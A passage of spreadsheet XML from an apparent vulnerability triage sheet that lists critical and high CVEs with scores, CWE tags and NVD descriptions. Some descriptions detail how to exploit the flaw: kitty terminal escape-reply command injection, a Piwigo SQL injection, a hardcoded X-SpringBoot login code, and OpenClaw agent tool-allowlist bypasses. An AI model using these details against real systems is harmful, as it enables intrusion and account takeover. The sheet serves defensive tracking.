          <t>P2 - High</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-95832</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>4daa8cea-433a-44bd-9456-53b127fc289a</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q12" s="5" t="inlineStr"/>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Special Elements in Output Used by a Downstream Component in the colour control escape code handler in kitty from 0.47.3 before 0.49.0 allows a program writing to the terminal to execute an arbitrary command in the user's shell, because color_control() in kitty/window.py answers a query for an unrecognised field name by placing that field name into the reply, and write_escape_code_to_child() in kitty/screen.c then writes the reply to the pseudoterminal master, where it is not distinguishable from input typed by the user, without neutralising it for the shell that reads it. The payload is reduced to printable ASCII before the field name is echoed, which is the restriction introduced in 0.47.3 as the fix for CVE-2026-54057, and the record and field separators ; and = are consumed as delimiters, but every other printable character survives, which is sufficient to compose a shell command. A newline is available from handle_remote_ssh() in kitty/window.py, which writes the bytes yielded by get_ssh_data() in kittens/ssh/utils.py, the first of which begin with a newline, to the pseudoterminal master before any credential carried in the request is checked. The reply is framed as an OSC sequence carrying the escape code number, the field name, and the literal value ?. This results in execution of an attacker-chosen command with the privileges of the user running the terminal.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-95832</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-39353</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>php, gin, rust, hp</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q13" s="5" t="inlineStr"/>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>CWE-693, CWE-732, CWE-98</t>
        </is>
      </c>
      <c r="S13" s="5" t="inlineStr">
        <is>
          <t>InvoicePlane is a self-hosted open source application for managing invoices, clients, and payments. Prior to 1.7.2-rc-1, InvoicePlane builds its permitted template list by scanning a PHP template directory that can be written through an administrator-controlled file-write capability. A malicious PHP file placed in the directory is automatically trusted by Mdl_templates and can be selected as public_invoice_template. When a public invoice is rendered, the guest View controller includes the trusted file and executes it with web-server privileges. This issue is fixed in version 1.7.2-rc-1.</t>
        </is>
      </c>
      <c r="T13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-39353</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42322</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q14" s="5" t="inlineStr"/>
      <c r="R14" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. Prior to 16.4.0, admin/themes_standard_pages.php validates uploaded logo content by MIME type but reuses the attacker-controlled extension from std_pgs_logo when constructing the stored filename. An authenticated administrator can upload image content with a server-executable final extension, causing the file to be placed in the web-accessible logo directory and executed when requested if the web server handles that extension. This can permit arbitrary command execution, data disclosure, modification, persistence, and service disruption. This vulnerability is fixed in 16.4.0.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42322</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62262</t>
        </is>
      </c>
      <c r="D15" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E15" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F15" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G15" s="5" t="inlineStr"/>
      <c r="H15" s="5" t="inlineStr"/>
      <c r="I15" s="5" t="inlineStr"/>
      <c r="J15" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K15" s="5" t="inlineStr"/>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P15" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q15" s="5" t="inlineStr"/>
      <c r="R15" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>Piwigo is a full featured open source photo gallery application for the web. In 17.0.0beta1 and earlier, when rating is enabled, an unauthenticated guest can call pwg.images.filteredSearch.create with a crafted ratings[] value and then open the returned search URL. include/ws_functions/pwg.images.php stores the unvalidated value in the search rules, and include/functions_search.inc.php integer-casts only the lower rating bound while concatenating the raw value as the SQL upper bound. This allows error-based or blind extraction of database information and database-dependent time delays through the public search flow. No fixed version is available as of this review.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62262</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84458</t>
        </is>
      </c>
      <c r="D16" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E16" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F16" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G16" s="5" t="inlineStr"/>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K16" s="5" t="inlineStr"/>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P16" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q16" s="5" t="inlineStr"/>
      <c r="R16" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Zammad is a web based open source helpdesk/customer support system. Prior to 7.1.2, when the "Automatic account link on initial logon" setting is enabled, Zammad binds an incoming third-party (SSO) identity to an existing local account by matching the email address the identity provider reports, without verifying that the provider actually confirmed ownership of that email. An attacker who controls any identity at a configured provider, including, by default, any Azure AD tenant via Zammad's multi-tenant Microsoft 365 /common app registration, can set that identity's email to a victim's address, authenticate, and be logged in as the victim. This bypasses the victim's local password entirely and affects any existing account, including agents and administrators. Zammad will honor the xms_edov ID token claim when email verification is required in the Microsoft 365 setting, treating a missing claim as unverified. This issue is fixed in version 7.1.2.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84458</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89055</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>go, gin</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>The Customer Reviews for WooCommerce plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.120.0. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for unauthenticated attackers to permanently delete arbitrary attachments from the Media Library — including administrator-owned product images, logos, and documents — by injecting their IDs into a review that is later trashed and purged. Exploitation requires a public review-form link (a 13-hex formId distributed to customers via e-mail), which exposes the nonce needed to reach the handler without any WordPress account or session.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89055</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93399</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-639</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>The Bookly plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 28.2 via the 'bookly_get_form_id', 'bookly_render_complete', 'bookly_add_to_calendar' and 'bookly_rollback_order' AJAX actions. This is due to the 'bookly_get_form_id' handler blindly storing the attacker-controlled 'order_id' from the submitted form_data into a new booking session, which the 'bookly_render_complete' handler then trusts to look up and return the corresponding Order's secret token without verifying that the current session created that order. This makes it possible for unauthenticated attackers to enumerate sequential order IDs, disclose other customers' order tokens, retrieve calendar/appointment information via 'bookly_add_to_calendar' and permanently delete arbitrary non-completed bookings via 'bookly_rollback_order', which cascade-deletes the customer_appointment and (when no other customers are attached) the underlying appointment.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93399</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97063</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>spring, gin</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 returns login verification codes in HTTP responses from unauthenticated endpoints GET /sys/mobile/code and GET /sys/email/code without sending them to account owners. Attackers can request codes using known mobile numbers or email addresses, read them from responses, and authenticate as victims via POST /sys/emailOrMobileLogin/login to hijack accounts.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97063</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97064</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr">
        <is>
          <t>spring, gin</t>
        </is>
      </c>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-1392</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>X-SpringBoot through 6.0 ships with a hardcoded static master login verification code 172839 enabled by default in the database seed. Unauthenticated attackers can authenticate as any user by submitting the public master code to the emailOrMobileLogin endpoint with a known email or mobile number.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97064</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-51457</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-77</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>D-Link DAP-2610 up to 2.06B08r099 contains an authenticated command injection vulnerability within the web interface at the /index.xgi endpoint. An attacker with authenticated access can exploit some parameters to execute arbitrary system commands.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-51457</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100520</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Laranode versions before 1.2.1 contain a path traversal vulnerability in the POST /filemanager/upload-file endpoint that allows authenticated users to write arbitrary files outside their home directory. Attackers can supply directory traversal sequences in the path parameter to write PHP files into other tenants' web roots and execute code as those tenants.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100520</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100544</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>openclaw's @openclaw/voice-call package before 2026.8.1 launches the configured agent for classic inbound voice calls without propagating the caller's identity or non-owner status. As a result, owner-only tool filtering can fail open and expose the agent's normal tool authority to a remote caller. A caller who is admitted by the configured inbound-call policy (open, pairing, or allowlist) on a deployment with inbound calling enabled can therefore drive tools intended for the trusted owner, potentially reading data, modifying files, executing commands, or controlling connected services depending on the agent's configuration. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100544</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100552</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>OpenClaw (npm package 'openclaw') before 2026.8.1 does not correctly enforce per-chat tool policies for Codex app-server runtime tools. A conversation-level tools.allow rule filtered OpenClaw tools but did not restrict the shell, process, file, and patch tools owned by the Codex runtime. When a lower-trust conversation was assigned to a Codex runtime and restricted with a per-chat tool allowlist, a participant able to trigger that agent could still reach native command and file tools, bypassing the configured allowlist. The practical impact depends on the runtime's host permissions and sandbox configuration. The issue is fixed in 2026.8.1.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100552</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100575</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>OpenClaw Slack versions before 2026.8.1 fail to properly enforce sender allowlists in multi-person direct messages. Disallowed participants can trigger Slack agents and access tools and data granted to those agents by bypassing configured sender policies.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100575</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100580</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr">
        <is>
          <t>npm, rust</t>
        </is>
      </c>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-26</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-178</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
